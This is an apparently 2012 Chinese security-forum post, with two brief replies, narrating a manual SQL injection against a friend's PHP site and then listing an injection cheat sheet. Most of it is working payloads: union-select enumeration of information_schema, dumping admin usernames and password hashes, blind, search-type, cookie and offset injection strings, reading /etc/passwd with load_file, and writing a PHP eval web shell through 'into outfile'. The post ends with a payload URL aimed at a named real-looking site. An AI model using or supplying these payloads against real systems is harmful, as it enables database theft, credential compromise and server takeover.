找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2920|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~3 Z# n" N. `& V/ j0 u% p
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?  T; P( P0 n* R" h% \$ V
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
3 I* I8 X0 K3 U' p! Z如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
- {) F& |1 F, x! i3 A1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)2 w8 l7 ~) A  a
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
6 P, x; L2 _! k2 J" ^+ oWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
# p7 |/ [/ Z/ [) L2 K. y/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
5 F" O) b9 E3 Y# M: t$ R                        
1 R  |: y0 V# k& ?6 Q" @2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,: N3 ?2 \  U: n+ r
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意
+ H: ]# [% R" S* ?: A: t6 K5 ?4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
( t0 D' J8 h) z1 b' u. P! ?, V6 ^5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。8 |  O) Z" S; n9 ^8 h, K6 V
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,1 M- r6 U' L% A+ X/ l
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
8 ^+ U/ ~3 I% C我就用的是第二个思路,
* a6 o5 k/ i9 X& ]8 t1 i提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
' O. j5 `1 b' N3 h' p$ h9 K6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,2 X" y% w9 a& `8 k
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
! Q, t  S! L! L* @6 n% l2 z% z1 B注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
$ \" c2 Z/ ^! |! D" M* H7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????/ {+ L% T: X. `' d
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
9 d5 b0 x* ^( z0 x提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --' i% U& z  P0 x4 N: x
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,! D0 v( J! b# j; j) s) k
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......# k, ]6 v" D! y8 U2 O
下面是一些很普遍注入方式资料:
7 g, T- a( u) A5 P# ]( p6 }  V注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='. b: ^7 M7 I8 I# b/ I
拆半法9 h: m& H8 n9 P2 ]* n
######################################
+ M. T, t9 M* p0 J, Kand exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。
) A5 Z" K* i& q* D; b0 n- @and exists (select * from admin)
+ G) i. [$ Z  n) ]% i1 A2 ]) I  j8 cand exists(select id from admin)' g, L6 B3 h; f% N1 \% C* H
and exists(select id from admin where id=1)" C: e5 k- i% E
and exists(select id from admin where id>1)
9 \6 g' t2 u  ?+ L2 j然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
0 I3 l4 {  G4 O, Xand exists (select username from admin): C$ u0 `8 y: R" e5 y
and exists (select password from admin)
6 h. r3 c. T6 a) z4 Sand exists (select id from admin where len(username)<10 and id=1)
4 F. B0 X) n+ V% R6 Nand exists (select id from admin where len(username)>5 and id=1)2 _6 h8 B- m" h5 w
and exists (select id from admin where len(username)=6 and id=1)
  Q) D8 Q) x% M/ o- V0 M/ Pand exists (select id from admin where len(password)<10 and id=1). K, ]1 K- l+ l/ D
and exists (select id from admin where len(password)>5 and id=1)
6 `( _$ w' i. V1 q: hand exists (select id from admin where len(password)=7 and id=1)- q8 S6 h; {" r! I& {- Q
and (select top 1 asc(mid(username,1,1)) from admin)=97; N) N7 N% S3 F3 C# K" ]
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
' o& F/ y" y0 s; c2 f/ H猜第二位把username,1,1改成username,2,1就可以了。$ {" x2 h3 }# I  x
猜密码把username改成password就OK了
, @  n( T( D3 W- o##################################################* u6 q/ A4 s; _  \8 E
搜索型注入
0 P" k0 \$ {7 \! U: \: M##################################+ g4 K5 s' ]9 Z
%' and 1=1 and '%'='3 L9 T4 N; J$ i% T% D- b0 o0 ~
%' and exists (select * from admin) and '%'='* v/ I( C) q+ e4 z8 n- F; k
%' and exists(select id from admin where id=1) and '%'='. r% [4 x) I: [. T$ c
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
4 T% U, [$ ]1 x5 U( [1 ^%' and exists (select id from admin where len(password)=7 and id=1) and '%'='. L/ a4 g$ A3 o' M/ n; x3 w
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='& l# \( t1 e  `. K& `
这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='1 n" X; z) z; l
对于MSSQL数据库,后面可以吧 and '%'='换成--' T' d) w% h* }3 E3 R6 n2 e
还有一点搜索型注入也可以使用union语句。
. v$ T! O# T3 a! U: h& r& Q6 Q########################################################
3 t5 R. B$ A* B* {联合查询。
2 _* m5 f  E. A3 C#####################################
$ W: o6 u& }. Horder by 10
3 t5 ?: ?# T! ?! P8 Uand 1=2 union select 1,2,3,4,5,6,7,8,9,10/ e' L) i. |) K3 o' t/ \
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
3 A* V# m  x9 b+ G7 n" fand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
! h% V$ x2 ^% o+ r7 G  X, I很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
  I/ m* v6 R/ R* _$ B' X###################################. B8 K& F7 g4 \! _1 u' `1 v
cookie注入  y2 I* f9 l; K6 m2 A! U
###############################1 G2 y5 i" Q& E. B( Z" V
http://www.******.com/shownews.asp?id=127/ A. A0 ]3 R2 {6 c/ e
http://www.******.com/shownews.asp0 l6 ^3 b  B- P# j. u6 t. |6 T+ [  ^$ R
alert(="id="+escape("127"));! V' @. r$ }; ~) I4 M0 F, f
alert(="id="+escape("127 and 1=1"));6 t* \# N1 V- u7 n) j
alert(="id="+escape("127 order by 10"));8 I" N7 T) a( k. W) N1 v  c
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));/ F; ?2 X, d, Y5 x. G
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
. G8 U, W2 t% p  s$ V+ f! F2 Y* G& K这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。, I7 S7 _0 k; p0 \7 ?8 I
###################################
2 k+ A& C3 `( E/ W偏移注入
0 [/ @% s6 C$ Z& M! c###########################################################
0 v( P8 I# S% D+ j( munion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
& h+ v: f! C0 y0 l8 v1 Bunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin, ]5 C8 T, J; p. }  r! B7 J4 [
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
1 ~6 ~9 i- v7 x* l6 T: F2 B- w0 L) Sunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
* }+ _/ i! Y# G- ~2 q+ ^- Y) [union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)9 D* [1 t9 n- r6 I
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
  Y0 h+ O% K5 K1 Q" ?7 s% hunion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on0 q/ r5 O, q3 w! V, A
a.id=d.id)" W( `* O# y4 r/ f
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)! e1 z* m9 E. W/ ^4 `
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
2 J0 }9 O' Q. y5 i* J+ {  
$ X0 Y* {2 ~0 u, E. O============================================================================================================
+ t+ p) d# v, T. F# l( m1.判断版本
! c+ H3 m7 d+ U% Aand ord(mid(version(),1,1))>51' E6 V7 H/ m; K2 H1 L4 a$ e- E
返回正常,说明大于4.0版本,支持ounion查询! G$ z! D# ]* f6 z4 n9 x+ @6 L
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
% R; {1 P7 X# N' f4 ^: k' l9 band 2=4 union select 1,2,3,4,5,6,7,8,9--
3 c0 y3 x; d$ x5 n8 N( Q3.查看数据库版本及当前用户,
9 G% }; v$ E+ [and 2=4 union select 1,user(),version(),4,5,6,7,8,9--% e( |$ }0 X% P: S0 U6 _9 k/ k$ T* f
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,6 N! i) }: U% X- \/ q' C) X' f
4.判断有没有写权限
/ Y% u, B1 d$ f" T5 M' }8 iand (select count(*) from MySQL.user)>0-- # C* P2 @! b9 [- O" R$ z! T
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
3 c0 e* j  E- b( J  c用不了这个命令,就学习土耳其黑客手法,如下
( W2 t5 `9 O6 f; i7 `4 q- Y8 }) zand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--: A0 D9 S5 v4 K9 P( E" }9 x
6.爆表,爆库" l( D: C/ s+ T4 Y( u+ F. \) ^, x3 K
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--) J( ~0 u( ?& O: Z3 x7 D) D
7.爆列名,爆表
. k' G$ C( z6 P  v; J1 gand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
' k% i8 m# G! u1 D. D0 k6 P- d8.查询字段数,直接用limit N,1去查询,直接N到报错为止。! E6 e- W! E8 j) n6 Y0 Z) Z2 l/ Q' @( t
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--4 R( b% B0 ]( p
9.爆字段内容1 S" W' [. V. O" ?! I3 X
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--4 Q* L2 i8 q/ i3 a, j9 ^
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表